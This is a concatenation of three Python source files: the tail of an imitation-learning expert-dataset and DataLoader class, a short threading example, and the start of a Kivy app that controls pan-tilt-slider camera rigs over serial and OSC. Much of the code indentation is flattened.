traj_data = np.load(expert_path, allow_pickle=True)
if verbose > 0:
for key, val in traj_data.items():
print(key, val.shape)
# Array of bool where episode_starts[i] = True for each new episode
episode_starts = traj_data['episode_starts']
traj_limit_idx = len(traj_data['obs'])
if traj_limitation > 0:
n_episodes = 0
# Retrieve the index corresponding
# to the traj_limitation trajectory
for idx, episode_start in enumerate(episode_starts):
n_episodes += int(episode_start)
if n_episodes == (traj_limitation + 1):
traj_limit_idx = idx - 1
observations = traj_data['obs'][:traj_limit_idx]
actions = traj_data['actions'][:traj_limit_idx]
# obs, actions: shape (N * L, ) + S
# where N = # episodes, L = episode length
# and S is the environment observation/action space.
# S = (1, ) for discrete space
# Flatten to (N * L, prod(S))
if not special_shape:
if len(observations.shape) > 2:
observations = np.reshape(observations, [-1, np.prod(observations.shape[1:])])
if len(actions.shape) > 2:
actions = np.reshape(actions, [-1, np.prod(actions.shape[1:])])
indices = np.random.permutation(len(observations)).astype(np.int64)
# Train/Validation split when using behavior cloning
train_indices = indices[:int(train_fraction * len(indices))]
val_indices = indices[int(train_fraction * len(indices)):]
assert len(train_indices) > 0, "No sample for the training set"
assert len(val_indices) > 0, "No sample for the validation set"
self.observations = observations
self.actions = actions
self.returns = traj_data['episode_returns'][:traj_limit_idx]
self.avg_ret = sum(self.returns) / len(self.returns)
self.std_ret = np.std(np.array(self.returns))
self.verbose = verbose
        assert len(self.observations) == len(self.actions), "The number of actions and observations differ, " \
                                                            "please check your expert dataset"
self.num_traj = min(traj_limitation, np.sum(episode_starts))
self.num_transition = len(self.observations)
self.randomize = randomize
self.sequential_preprocessing = sequential_preprocessing
self.dataloader = None
self.train_loader = DataLoader(train_indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=sequential_preprocessing)
self.val_loader = DataLoader(val_indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=sequential_preprocessing)
if self.verbose >= 1:
self.log_info()
def init_dataloader(self, batch_size):
"""
Initialize the dataloader used by GAIL.
:param batch_size: (int)
"""
indices = np.random.permutation(len(self.observations)).astype(np.int64)
self.dataloader = DataLoader(indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=self.sequential_preprocessing)
def __del__(self):
del self.dataloader, self.train_loader, self.val_loader
def prepare_pickling(self):
"""
Exit processes in order to pickle the dataset.
"""
self.dataloader, self.train_loader, self.val_loader = None, None, None
def log_info(self):
"""
Log the information of the dataset.
"""
logger.log("Total trajectories: {}".format(self.num_traj))
logger.log("Total transitions: {}".format(self.num_transition))
logger.log("Average returns: {}".format(self.avg_ret))
logger.log("Std for returns: {}".format(self.std_ret))
def get_next_batch(self, split=None):
"""
Get the batch from the dataset.
:param split: (str) the type of data split (can be None, 'train', 'val')
:return: (np.ndarray, np.ndarray) inputs and labels
"""
dataloader = {
None: self.dataloader,
'train': self.train_loader,
'val': self.val_loader
}[split]
if dataloader.process is None:
dataloader.start_process()
try:
return next(dataloader)
except StopIteration:
dataloader = iter(dataloader)
return next(dataloader)
def plot(self):
"""
Show histogram plotting of the episode returns
"""
# Isolate dependency since it is only used for plotting and also since
# different matplotlib backends have further dependencies themselves.
import matplotlib.pyplot as plt
plt.hist(self.returns)
plt.show()
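# Minimal usage sketch (hedged; the .npz path and hyper-parameters are
# illustrative, not taken from this repository):
#
#     dataset = ExpertDataset(expert_path='expert_cartpole.npz',
#                             traj_limitation=10, batch_size=32)
#     obs, actions = dataset.get_next_batch('train')
#     dataset.plot()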
class DataLoader(object):
"""
    A custom dataloader to preprocess observations (including images)
    and feed them to the network.
Original code for the dataloader from https://github.com/araffin/robotics-rl-srl
(MIT licence)
Authors: Antonin Raffin, René Traoré, Ashley Hill
:param indices: ([int]) list of observations indices
:param observations: (np.ndarray) observations or images path
:param actions: (np.ndarray) actions
:param batch_size: (int) Number of samples per minibatch
    :param n_workers: (int) number of preprocessing workers (for loading the images)
    :param infinite_loop: (bool) whether to have an iterator that can be reset
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
:param shuffle: (bool) Shuffle the minibatch after each epoch
:param start_process: (bool) Start the preprocessing process (default: True)
:param backend: (str) joblib backend (one of 'multiprocessing', 'sequential', 'threading'
or 'loky' in newest versions)
    :param sequential: (bool) Do not use a subprocess to preprocess the data
        (slower, but uses less memory, e.g. for CI)
    :param partial_minibatch: (bool) Allow a final partial minibatch (one with
        fewer elements than batch_size)
"""
def __init__(self, indices, observations, actions, batch_size, n_workers=1,
infinite_loop=True, max_queue_len=1, shuffle=False,
start_process=True, backend='threading', sequential=False, partial_minibatch=True):
super(DataLoader, self).__init__()
self.n_workers = n_workers
self.infinite_loop = infinite_loop
self.indices = indices
self.original_indices = indices.copy()
self.n_minibatches = len(indices) // batch_size
        # Add a partial minibatch, for instance
        # when there are not enough samples to fill the last one
        if partial_minibatch and len(indices) % batch_size > 0:
self.n_minibatches += 1
self.batch_size = batch_size
self.observations = observations
self.actions = actions
self.shuffle = shuffle
self.queue = Queue(max_queue_len)
self.process = None
self.load_images = isinstance(observations[0], str)
self.backend = backend
self.sequential = sequential
self.start_idx = 0
if start_process:
self.start_process()
def start_process(self):
"""Start preprocessing process"""
# Skip if in sequential mode
if self.sequential:
return
self.process = Process(target=self._run)
        # Make it a daemon so it is terminated together
        # with the main process
self.process.daemon = True
self.process.start()
@property
def _minibatch_indices(self):
"""
Current minibatch indices given the current pointer
(start_idx) and the minibatch size
:return: (np.ndarray) 1D array of indices
"""
return self.indices[self.start_idx:self.start_idx + self.batch_size]
def sequential_next(self):
"""
Sequential version of the pre-processing.
"""
        if self.start_idx >= len(self.indices):
raise StopIteration
if self.start_idx == 0:
if self.shuffle:
# Shuffle indices
np.random.shuffle(self.indices)
obs = self.observations[self._minibatch_indices]
if self.load_images:
obs = np.concatenate([self._make_batch_element(image_path) for image_path in obs],
axis=0)
actions = self.actions[self._minibatch_indices]
self.start_idx += self.batch_size
return obs, actions
def _run(self):
start = True
with Parallel(n_jobs=self.n_workers, batch_size="auto", backend=self.backend) as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
np.random.shuffle(self.indices)
for minibatch_idx in range(self.n_minibatches):
self.start_idx = minibatch_idx * self.batch_size
obs = self.observations[self._minibatch_indices]
if self.load_images:
if self.n_workers <= 1:
obs = [self._make_batch_element(image_path)
for image_path in obs]
else:
obs = parallel(delayed(self._make_batch_element)(image_path)
for image_path in obs)
if len(obs) == 0:
continue
obs = np.concatenate(obs, axis=0)
actions = self.actions[self._minibatch_indices]
self.queue.put((obs, actions))
# Free memory
del obs
self.queue.put(None)
@classmethod
def _make_batch_element(cls, image_path, is_pc=True):
"""
Process one element.
        :param image_path: (str) path to an image, or to a point-cloud ``.npz`` file
        :param is_pc: (bool) if True, treat ``image_path`` as a point-cloud archive
        :return: (np.ndarray)
"""
if is_pc:
pc_data = np.load(image_path)
pc = pc_data["obs"]
pc = np.expand_dims(pc, axis=0)
return pc
# cv2.IMREAD_UNCHANGED is needed to load
# grey and RGBa images
        image = cv2.imread(image_path, cv2.IMREAD_UNCHANGED)
        if image is None:
            raise ValueError("Tried to load {}, but it was not found".format(image_path))
        # Grey image
        if len(image.shape) == 2:
            image = image[:, :, np.newaxis]
# Convert from BGR to RGB
if image.shape[-1] == 3:
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image.reshape((1,) + image.shape)
return image
def __len__(self):
return self.n_minibatches
def __iter__(self):
self.start_idx = 0
self.indices = self.original_indices.copy()
return self
def __next__(self):
if self.sequential:
return self.sequential_next()
if self.process is None:
raise ValueError("You must call .start_process() before using the dataloader")
while True:
try:
val = self.queue.get_nowait()
break
except queue.Empty:
time.sleep(0.001)
continue
if val is None:
raise StopIteration
return val
def __del__(self):
if self.process is not None:
self.process.terminate()
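# Driving the DataLoader directly in sequential mode (hedged sketch; `obs` and
# `acts` stand in for arrays or image paths):
#
#     indices = np.arange(len(obs))
#     loader = DataLoader(indices, obs, acts, batch_size=32, shuffle=True,
#                         sequential=True, start_process=False)
#     for batch_obs, batch_actions in loader:
#         ...  # feed the minibatch to the network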
|
threading_simple.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Creating and waiting for a thread.
"""
#end_pymotw_header
import threading
def worker():
"""thread worker function"""
print('Worker')
threads = []
for i in range(5):
t = threading.Thread(target=worker)
threads.append(t)
t.start()
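# Hedged addition (not part of the original PyMOTW example): to actually wait
# for the workers, join them after starting:
#
#     for t in threads:
#         t.join()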
|
PTSApp.py
|
#macOS
#Kivy
#python3 -m pip install "kivy[base] @ https://github.com/kivy/kivy/archive/master.zip"
#
#KivyMD
#git clone https://github.com/kivymd/KivyMD.git --depth 1
#cd KivyMD
#pip install .
#
#Other
#python3 -m pip install pygame==2.0.1
#python3 -m pip install usbserial4a
#python3 -m pip install python-osc
#python3 -m pip install pyserial
#python3 -m pip install pyjnius
#python3 -m pip install pynput
#python3 -m pip install pyinstaller
#macOS
#pyinstaller --onefile --windowed --icon PTSApp-Icon.icns --osx-bundle-identifier 'com.bradders' --name PTSApp PTSApp.py
#
#Windows
#pyinstaller --onefile --windowed --icon="PTSApp-Icon.ico" PTSApp.py
import asyncio
import threading
from kivy.app import App
from kivy.clock import mainthread
from kivy.event import EventDispatcher
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.popup import Popup
from kivy.uix.textinput import TextInput
from kivy.utils import platform
from kivy.core.window import Window
from kivy.config import Config
if platform == 'android':
Config.set('graphics', 'fullscreen', 'auto')
Config.set('graphics', 'window_state', 'maximized')
Config.write()
else:
Config.set('graphics', 'fullscreen', '0')
Config.set('graphics', 'window_state', 'windowed')
#Config.set('graphics', 'width', '1900') #test
#Config.set('graphics', 'height', '1000') #test
Config.set('graphics', 'width', '1340') # A7 Lite
Config.set('graphics', 'height', '703') # A7 Lite
#Config.set('graphics', 'width', '2000') # A7
#Config.set('graphics', 'height', '1092') # A7
Config.set('kivy','window_icon','PTSApp-Icon.png')
Config.write()
#Window.size = (1340, 800) # A7 - 2000 x 1200 # A7 Lite - 1340 x 800 (0.8775)
from kivy.lang import Builder
from kivy.clock import mainthread
from kivy.clock import Clock
from kivy.utils import get_color_from_hex
from kivy.properties import NumericProperty
#from pynput.keyboard import Listener
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.behaviors.focus import FocusBehavior
from kivymd.app import MDApp
import threading
import os, sys
import time
from pathlib import Path
from pythonosc.osc_server import AsyncIOOSCUDPServer
from pythonosc.udp_client import SimpleUDPClient
from pythonosc.dispatcher import Dispatcher
window_sizes=Window.size
xDivSet = window_sizes[0] * 0.007462686567
yDivSet = window_sizes[1] * 0.01422475107
xScreenSet = window_sizes[0]
yScreenSet = window_sizes[1]
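# Hedged note: 1/134 ~ 0.007462686567 and 1/70.3 ~ 0.01422475107, so xDivSet and
# yDivSet split the window into a 134 x 70.3 grid of layout units. At the default
# A7 Lite size (1340 x 703) each unit is exactly 10 px:
#
#     1340 * 0.007462686567  # -> 10.0 px per horizontal unit
#     703 * 0.01422475107    # -> 10.0 px per vertical unit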
Cam1TextColour = '55FF55'
Cam2TextColour = '9DDDFF'
Cam3TextColour = 'FFFF55'
Cam1ButColour = '#208020'
Cam2ButColour = '#405C80'
Cam3ButColour = '#807100'
cam1Pos1Set = False
cam1Pos2Set = False
cam1Pos3Set = False
cam1Pos4Set = False
cam1Pos5Set = False
cam1Pos6Set = False
cam1Pos1Run = False
cam1Pos2Run = False
cam1Pos3Run = False
cam1Pos4Run = False
cam1Pos5Run = False
cam1Pos6Run = False
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam2Pos1Set = False
cam2Pos2Set = False
cam2Pos3Set = False
cam2Pos4Set = False
cam2Pos5Set = False
cam2Pos6Set = False
cam2Pos1Run = False
cam2Pos2Run = False
cam2Pos3Run = False
cam2Pos4Run = False
cam2Pos5Run = False
cam2Pos6Run = False
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam3Pos1Set = False
cam3Pos2Set = False
cam3Pos3Set = False
cam3Pos4Set = False
cam3Pos5Set = False
cam3Pos6Set = False
cam3Pos1Run = False
cam3Pos2Run = False
cam3Pos3Run = False
cam3Pos4Run = False
cam3Pos5Run = False
cam3Pos6Run = False
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
OLDcam1Pos1Set = False
OLDcam1Pos2Set = False
OLDcam1Pos3Set = False
OLDcam1Pos4Set = False
OLDcam1Pos5Set = False
OLDcam1Pos6Set = False
OLDcam1AtPos1 = False
OLDcam1AtPos2 = False
OLDcam1AtPos3 = False
OLDcam1AtPos4 = False
OLDcam1AtPos5 = False
OLDcam1AtPos6 = False
OLDcam1Pos1Run = False
OLDcam1Pos2Run = False
OLDcam1Pos3Run = False
OLDcam1Pos4Run = False
OLDcam1Pos5Run = False
OLDcam1Pos6Run = False
OLDcam2Pos1Set = False
OLDcam2Pos2Set = False
OLDcam2Pos3Set = False
OLDcam2Pos4Set = False
OLDcam2Pos5Set = False
OLDcam2Pos6Set = False
OLDcam2AtPos1 = False
OLDcam2AtPos2 = False
OLDcam2AtPos3 = False
OLDcam2AtPos4 = False
OLDcam2AtPos5 = False
OLDcam2AtPos6 = False
OLDcam2Pos1Run = False
OLDcam2Pos2Run = False
OLDcam2Pos3Run = False
OLDcam2Pos4Run = False
OLDcam2Pos5Run = False
OLDcam2Pos6Run = False
OLDcam3Pos1Set = False
OLDcam3Pos2Set = False
OLDcam3Pos3Set = False
OLDcam3Pos4Set = False
OLDcam3Pos5Set = False
OLDcam3Pos6Set = False
OLDcam3AtPos1 = False
OLDcam3AtPos2 = False
OLDcam3AtPos3 = False
OLDcam3AtPos4 = False
OLDcam3AtPos5 = False
OLDcam3AtPos6 = False
OLDcam3Pos1Run = False
OLDcam3Pos2Run = False
OLDcam3Pos3Run = False
OLDcam3Pos4Run = False
OLDcam3Pos5Run = False
OLDcam3Pos6Run = False
cam1SliderSpeed = 1
cam2SliderSpeed = 1
cam3SliderSpeed = 1
oldCam1Speed = 9
oldCam2Speed = 9
oldCam3Speed = 9
cam1PTSpeed = 1
cam2PTSpeed = 1
cam3PTSpeed = 1
oldCam1PTSpeed = 9
oldCam2PTSpeed = 9
oldCam3PTSpeed = 9
SetPosToggle = False
whichCamSerial = 1
interval = 0.2
previousTicks = time.time() + interval
PTJoy = (0, 0)
abs_coord_x = None
abs_coord_y = None
abs_coords = None
arr = []
oldAxisX = 0
oldAxisY = 0
oldAxisZ = 0
axisX = 0
axisY = 0
axisZ = 0
data = bytearray(8)
hat = ()
oldHatX = 0
oldHatY = 0
previousTime = time.time()
currentMillisMoveCheck = time.time()
previousMillisMoveCheck = time.time()
moveCheckInterval = 0.3
whichCamRead = 1
mousePTClick = False
mouseSlClick = False
doKeyControl = True
doKeyControlA = False
doKeyControlD = False
doKeyControlW = False
doKeyControlS = False
PTKeyChange = False
doKeyControlSL = False
doKeyControlSR = False
SlKeyChange = False
mouseMoving = False
panKeyPressed = False
tiltKeyPressed = False
sliderKeyPressed = False
cam1isZooming = False
cam1isRecording = False
cam2isZooming = False
cam2isRecording = False
cam3isZooming = False
cam3isRecording = False
isZooming = False
clearWhichCam = 1
btn_scan_show = False
btn_help_show = False
longestSerial = 0
device = None
device_name = None
USBrequsted = False
whichCamOSC = 1
whileLoopRun = True
serialLoop = True
moveType = 3
moveTypeOld = 0
resetButtons = False
msg = ''
if platform == 'android':
from usb4a import usb
from usbserial4a import serial4a
else:
from serial.tools import list_ports
from serial import Serial
KV = """
#:import get_color_from_hex kivy.utils.get_color_from_hex
MDScreen:
md_bg_color: get_color_from_hex("#21282D")
canvas:
# Joystick
Color:
rgba: get_color_from_hex("#7D0000") # Red
Rectangle:
pos: (app.xDiv*1.6), (app.yDiv*25.3)
size: (app.xDiv*36.8), (app.yDiv*44)
Color:
rgba: get_color_from_hex("#444444") # Grey
#Speed Border
#PT
Rectangle:
pos: (app.xDiv*50.5), (app.yDiv*0.5)
size: (app.xDiv*18), (app.yDiv*23)
#Slider
Rectangle:
pos: (app.xDiv*71.5), (app.yDiv*0.5)
size: (app.xDiv*18), (app.yDiv*23)
#Zoom
Rectangle:
pos: (app.xDiv*92.5), (app.yDiv*0.5)
size: (app.xDiv*13), (app.yDiv*23)
#Background Colour
Color:
rgba: (0.1, 0.1, 0.1, 1) # Dark Grey BG
#Joy PT Background
Rectangle:
pos: (app.xDiv*2), (app.yDiv*33)
size: (app.xDiv*36), (app.yDiv*36)
#Joy Slider Background
Rectangle:
pos: (app.xDiv*2), (app.yDiv*25.6)
size: (app.xDiv*36), (app.yDiv*7)
#Cam1 Speed BG
Rectangle:
pos: (app.xDiv*55), (app.yDiv*17)
size: (app.xDiv*9), (app.yDiv*6)
Rectangle:
pos: (app.xDiv*76), (app.yDiv*17)
size: (app.xDiv*9), (app.yDiv*6)
#Cam2 Speed BG
Rectangle:
pos: (app.xDiv*55), (app.yDiv*9)
size: (app.xDiv*9), (app.yDiv*6)
Rectangle:
pos: (app.xDiv*76), (app.yDiv*9)
size: (app.xDiv*9), (app.yDiv*6)
#Cam3 Speed BG
Rectangle:
pos: (app.xDiv*55), (app.yDiv*1)
size: (app.xDiv*9), (app.yDiv*6)
Rectangle:
pos: (app.xDiv*76), (app.yDiv*1)
size: (app.xDiv*9), (app.yDiv*6)
#Cam1 Speed Zoom
Rectangle:
pos: (app.xDiv*97), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
#Cam2 Speed Zoom
Rectangle:
pos: (app.xDiv*97), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
#Cam3 Speed Zoom
Rectangle:
pos: (app.xDiv*97), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
FloatLayout:
id: cam1PTSpd
sizPT1: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*55), (app.yDiv*17)
size: self.sizPT1
FloatLayout:
id: cam2PTSpd
sizPT2: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*55), (app.yDiv*9)
size: self.sizPT2
FloatLayout:
id: cam3PTSpd
sizPT3: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*55), (app.yDiv*1)
size: self.sizPT3
FloatLayout:
id: cam1SlSpd
sizSl1: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*76), (app.yDiv*17)
size: self.sizSl1
FloatLayout:
id: cam2SlSpd
sizSl2: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*76), (app.yDiv*9)
size: self.sizSl2
FloatLayout:
id: cam3SlSpd
sizSl3: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*76), (app.yDiv*1)
size: self.sizSl3
ScrollView:
# Serial Read
id: scroll_view
always_overscroll: False
pos: (app.xDiv*50), (app.yDiv*25)
size: (app.xDiv*83), (app.yDiv*40)
size_hint: None, None
do_scroll_x: False
do_scroll_y: True
canvas.before:
Color:
rgba: (0.1, 0.1, 0.1, 1)
Rectangle:
pos: self.pos
size: self.size
Color:
rgba: get_color_from_hex("#333333")
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Label:
id: txtInput_read
font_name: "RobotoMono-Regular"
size_hint: None, None
size: self.texture_size
padding: 5, 2
halign: "left"
valign: "top"
markup: True
text: ''
FloatLayout:
id: helpCanvas
visible: False
opacity: 1 if self.visible else 0
helpRGB: (0.2, 0.2, 0.2, 1)
canvas:
Color:
rgb: self.helpRGB
Rectangle:
pos: (app.xDiv*76), (app.yDiv*25)
size: (app.xDiv*45), (app.yDiv*40)
Label:
id: helpLabel
visible: False
font_name: "RobotoMono-Regular"
font_size: '13dp' #(app.yDiv*1.4)
pos: (app.xDiv*59), (app.yDiv*14)
size_hint: None, None
size: (app.xDiv*80), (app.yDiv*60)
#size_hint_x: 1 if self.visible else 0
opacity: 1 if self.visible else 0
halign: "left"
valign: "top"
markup: True
text: 'OSC Server Port: 6503\\nOSC Client Port: 1337\\n\\nSerial Text Commands:\\ns(int) = Pan speed (º/s)\\nS(int) = Tilt speed (º/s)\\na(int) = Slide speed (mm/s)\\n\\nq(float) = Pan accel\\nQ(float) = Tilt accel\\nw(float) = Slide accel\\n\\ne(int) = Joystick pan accel factor (1 = 100%)\\nE(int) = Joystick tilt accel factor (1 = 100%)\\nD(int) = Joystick slide accel factor (1 = 100%)\\n\\nd(int) = Slide speed increments\\nf(int) = Slide min speed limit\\nF(int) = Slide max speed limit\\n\\nU = Save to EEPROM\\n'
ScrollView:
id: scanDD
pos: app.xScreen, app.yScreen
size: (app.xDiv*30), app.yScreen
size_hint: None, None
do_scroll_x: False
BoxLayout:
id: box_list
orientation: 'vertical'
on_parent: app.uiDict['box_list'] = self
size: (app.xDiv*25), (app.yDiv*6)
size_hint: None, None
height: max(self.parent.height, self.minimum_height)
FloatLayout:
TextInput:
id: textInput
pos: (app.xDiv*122), (app.yDiv*61)
size: (app.xDiv*10), (app.yDiv*3)
size_hint: None, None
#Label:
# id: OSCSend
# font_name: "RobotoMono-Regular"
# pos: (app.xDiv*45), (app.yDiv*65.7)
# size_hint: None, None
# size: (app.xDiv*8), (app.yDiv*6)
# halign: "left"
# valign: "top"
# markup: True
# text: 'Test'
#Label:
# id: OSCRec
# font_name: "RobotoMono-Regular"
# pos: (app.xDiv*45), (app.yDiv*63.7)
# size_hint: None, None
# size: (app.xDiv*8), (app.yDiv*6)
# halign: "left"
# valign: "top"
# markup: True
# text: 'Test2'
Button:
id: btnL10
pos: (app.xDiv*3), (app.yDiv*48)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joyL10()
Button:
id: btnL1
pos: (app.xDiv*10), (app.yDiv*48)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:".1"
on_press: app.joyL1()
Button:
id: btnR1
pos: (app.xDiv*24), (app.yDiv*48)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:".1"
on_press: app.joyR1()
Button:
id: btnR10
pos: (app.xDiv*31), (app.yDiv*48)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joyR10()
Button:
id: btnU10
pos: (app.xDiv*17), (app.yDiv*62)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joyU10()
Button:
id: btnU1
pos: (app.xDiv*17), (app.yDiv*55)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:".1"
on_press: app.joyU1()
Button:
id: btnD1
pos: (app.xDiv*17), (app.yDiv*41)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:".1"
on_press: app.joyD1()
Button:
id: btnD10
pos: (app.xDiv*17), (app.yDiv*34)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joyD10()
Button:
id: btnSL100
pos: (app.xDiv*3), (app.yDiv*26)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"100"
on_press: app.joySL100()
Button:
id: btnSL10
pos: (app.xDiv*10), (app.yDiv*26)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joySL10()
Button:
id: btnSR10
pos: (app.xDiv*24), (app.yDiv*26)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joySR10()
Button:
id: btnSR100
pos: (app.xDiv*31), (app.yDiv*26)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"100"
on_press: app.joySR100()
Button:
id: PTJoyDotPress
pos: (app.xDiv*18), (app.yDiv*49)
size: (app.xDiv*4), (app.yDiv*4)
size_hint: None, None
background_normal: ''
background_down: ''
background_color: get_color_from_hex("#7D0000")
text: ''
on_press: app.PTJoyDotPressed()
Button:
id: PTJoyDot
pos: app.xScreen, app.yScreen
size: (app.xDiv*4), (app.yDiv*4)
size_hint: None, None
background_normal: ''
background_down: ''
background_color: get_color_from_hex("#7D0000")
text: ''
Button:
id: SlJoyDotPress
pos: (app.xDiv*18), (app.yDiv*27)
size: (app.xDiv*4), (app.yDiv*4)
size_hint: None, None
background_normal: ''
background_down: ''
background_color: get_color_from_hex("#7D0000")
text: ''
on_press: app.SlJoyDotPressed()
Button:
id: SlJoyDot
pos: app.xScreen, app.yScreen
size: (app.xDiv*4), (app.yDiv*4)
size_hint: None, None
background_normal: ''
background_down: ''
background_color: get_color_from_hex("#7D0000")
text: ''
Button:
id: setPos
pos: (app.xDiv*39.5), (app.yDiv*27)
size: (app.xDiv*9), (app.yDiv*4)
size_hint: None, None
font_size: (app.yDiv*2)
text:"Set Pos"
background_normal: ''
background_color: get_color_from_hex("#666666")
on_press: app.setPos(3)
Button:
id: btnCam1Go1
text:"1"
pos: (app.xDiv*1), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go1()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go2
text:"2"
pos: (app.xDiv*9), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go2()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go3
text:"3"
pos: (app.xDiv*17), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go3()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go4
text:"4"
pos: (app.xDiv*25), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go4()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go5
text:"5"
pos: (app.xDiv*33), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go5()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go6
text:"6"
pos: (app.xDiv*41), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go6()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1PT-
text: "PT\\n-"
halign: 'center'
pos: (app.xDiv*51), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1PTSpeedDec()
Button:
id: btnCam1PT+
text: "PT\\n+"
halign: 'center'
pos: (app.xDiv*64), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1PTSpeedInc()
Button:
id: btnCam1Sl-
text: "Sl\\n-"
halign: 'center'
pos: (app.xDiv*72), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1SliderSpeedDec()
Button:
id: btnCam1Sl+
text: "Sl\\n+"
halign: 'center'
pos: (app.xDiv*85), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1SliderSpeedInc()
Button:
id: btnCam1Zm-
text:"Zm\\nOUT"
halign: 'center'
pos: (app.xDiv*93), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1ZoomOut()
